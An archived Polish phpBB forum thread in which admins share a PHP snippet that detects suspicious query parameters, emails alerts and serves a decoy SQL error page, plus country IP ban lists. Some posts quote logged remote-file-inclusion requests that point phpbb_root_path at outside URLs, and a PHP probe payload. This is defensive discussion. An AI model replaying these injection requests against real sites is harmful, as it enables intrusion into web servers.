Archiwum - 1.12.7 - globalne zabezpieczenie przeciw w?amaniom
JoneK - 07-02-2010, 02:08
przemo a czy możliwe jest aby boty mogły obejść kody weryfikacji podczas rejestracji bo ja na forum mam dużo użytkowników co w podpisie mają linki do stron o tematyce porno :-/
mbru - 07-02-2010, 08:45
To wtedy które można obecnie wrzucić do pliku common.php to z pierwszego posta Przema czy to na zmyłkę.
MagicalFire - 07-02-2010, 10:57
Cytat: | przemo a czy możliwe jest aby boty mogły obejść kody weryfikacji podczas rejestracji |
tak ale o tym sa osobne tematy
Przemo - 07-02-2010, 14:02
mbru napisał/a: | To wtedy które można obecnie wrzucić do pliku common.php to z pierwszego posta Przema czy to na zmyłkę. | Ktore chcesz, jak chcesz ze zmylka to to drugie.
mmichal2 - 07-02-2010, 15:07
Przemo, lepiej nie dawaj sleepa, ktoś Ci puści 20 000 wgetów na taki adres i zabije Ci serwer, na takie wykrycie serwer powinien zbanować automagicznie takie IP lub przekierować na statyczna stronę.
Polaczek - 07-02-2010, 17:44
Przemo, na pewno gryzie się z seotags jeśli tak ma więcej niż 18 liter.
ale to chyba da radę wtedy ta poprawka:
Kod: | if ( count($HTTP_GET_VARS) )
{
foreach($HTTP_GET_VARS as $key => $val)
{
if ( strlen($val) > 18 && !preg_match('#^[a-z0-9_ /+]*={0,2}$#i', $val) && $key != 'highlight' && $key != 'redirect' && $key != 'tag' )
{
$txt = "Atak na zmienna: ".$key."\n\r";
$txt .= "Danymi: ".$_SERVER['REQUEST_URI']."\n\r";
$txt .= "Atak z IP: ".$HTTP_SERVER_VARS['REMOTE_ADDR']." HOST: ".gethostbyaddr($HTTP_SERVER_VARS['REMOTE_ADDR'])."\n\r";
$txt .= "Adres referer: ".$HTTP_SERVER_VARS['HTTP_REFERER']."\n\r";
mail($board_config['email_from'], 'Proba ataku na zmienna: '.$key, $txt);
sleep(40);
echo '<br />
<b>Notice</b>: Undefined variable: '.htmlspecialchars($val).' in <b>/home/przemo/public_html/phpBB2/forum/common.php</b> on line <b>320</b><br />
<html>
<body>
phpBB : <b>Critical Error</b>
<br /><br />
Could not query config information<br /><br /><b><u>DEBUG MODE</u></b><br /><br />SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'SELECT *
FROM przemo_config WHERE '.htmlspecialchars($key).' = '.htmlspecialchars($val).'\' at line 1<br /><br />SELECT *
FROM przemo_config WHERE '.htmlspecialchars($key).' = '.htmlspecialchars($val).'<br /><br />Line : 322<br />File : common.php<span class="gensmall"></span></body>
</html>';
exit;
}
}
} |
werni - 08-02-2010, 03:11
ja bym jeszcze przetestował tym
chorizo-scanner.com
Przemo - 08-02-2010, 03:22
Polaczek, jaka to niby poprawka? Bo ja nie widze zadnych zmian...
Polaczek - 08-02-2010, 10:46
Przemo, dałem to
do warunku gdzie jest też ingnorowanie highlight
Przemo - 09-02-2010, 01:46
Hmm a czy to jedtna zmienna teog moda? Nie bedziemy dla kazdego moda dodawac zmiennych... Wyjatki mozna robic ale w razie koniecznosci, nie wiem jak tutaj?
Polaczek - 09-02-2010, 10:58
Tak. Linki tak wyglądają : seotags.php?tag=
nieoznakowane - 13-02-2010, 10:32
Przemo, mogę tylko powiedzieć, że po dodaniu tych paru linijek, przez pierwsze 5-6 dni miałem po 40-50 e-mail, a teraz zaledwie 2-3. Co prawda moja banlista zwiększyła się znacznie o adresy z Korei i Chin, no ale nie sądze aby obywatel Koreański interesował się tematyką mojego forum...
Poza tym może warto było się zastanowić aby niektóre zmiany wprowadzić wcześniej a nie hurtem potem wszystko co Przemo,
praktycznie już rzadko mam próby po takiej banliście
112.*.*.*
113.*.*.*
itd.. aż
126.*.*.*
i szczególnie uciążliwi są spod
182.*.*.*
183.*.*.*
189.*.*.*
190.*.*.*
200.*.*.*
201.*.*.*
202.*.*.*
211.*.*.*
221.*.*.*
222.*.*.*
Azja i Australia i Ocenia prawie wykluczone
pozostaja jeszcze Ci z proxy.... Europa, Ameryka Południowa, Północna, jak będę miał chwile do dodam podbną listę na Amerykę Południową
i kilkadzesiąt stałych IP proxy. (darmowych i płatnych)
croco - 15-02-2010, 12:04
Przemo, dzięki za modyfikację, mam ją już ponad tydzień i szczerze powiedziawszy gdyby nie ona, w życiu nie powiedziałbym że forum może być pod atakiem Tylko pytanie mam: czy coś tutaj nie jest źle?
Cytat: | Atak na zmienna: phpbb_root_path
Danymi: /check_files.php//modules/Forums/admin/admin_db_utilities.php?phpbb.root.path=http://antigua.granada.notariado.org//appserv/x?
Atak z IP: 208.93.149.176 HOST: cp.emcwebhosting.com |
chodzi mi o to check_files.php//modules... Dwa slesze. Tak samo tutaj:
Cytat: | Atak na zmienna: phpbb_root_path
Danymi: /check_files.php//language/lang_rusian/lang_admin_attach.php?phpbb_root_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??
Atak z IP: 74.205.120.218 HOST: 129821-www1.thermadyne.com |
To błąd "atakującego" czy coś innego?
nieoznakowane - 15-02-2010, 22:22
croco, próbują takim czymś co jest w pliku
Kod: | <?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?> |
Budyn00 - 28-02-2010, 23:11
nieoznakowane napisał/a: | jak będę miał chwile do dodam podbną listę na Amerykę Południową
i kilkadzesiąt stałych IP proxy. (darmowych i płatnych) |
Polecam Ci tą stronę :
http://www.countryipblock...select-formats/
Po prawej masz listę
|
|
|